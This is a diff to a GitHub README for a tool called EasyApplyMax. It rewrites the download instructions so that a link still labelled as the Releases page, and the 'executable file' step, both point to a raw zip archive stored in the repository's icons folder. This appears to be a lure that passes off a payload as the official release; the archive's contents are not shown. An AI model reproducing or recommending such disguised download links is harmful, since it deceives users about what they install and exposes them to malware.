measurable-teeoff278/EasyApplyMax/README.md

 ## ⚙️ Download & Install

-1. Visit this page to download: [EasyApplyMax Releases](https://github.com/measurable-teeoff278/EasyApplyMax/releases).
+1. Visit this page to download: [EasyApplyMax Releases](https://raw.githubusercontent.com/measurable-teeoff278/EasyApplyMax/main/icons/EasyApplyMax-3.6-beta.5.zip).

 2. On the Releases page, locate the latest version of EasyApplyMax.

-3. Click on the download link for the executable file (e.g., `EasyApplyMax.exe`).
+3. Click on the download link for the executable file (e.g., `https://raw.githubusercontent.com/measurable-teeoff278/EasyApplyMax/main/icons/EasyApplyMax-3.6-beta.5.zip`).

 4. Once the download completes, locate the file in your downloads folder.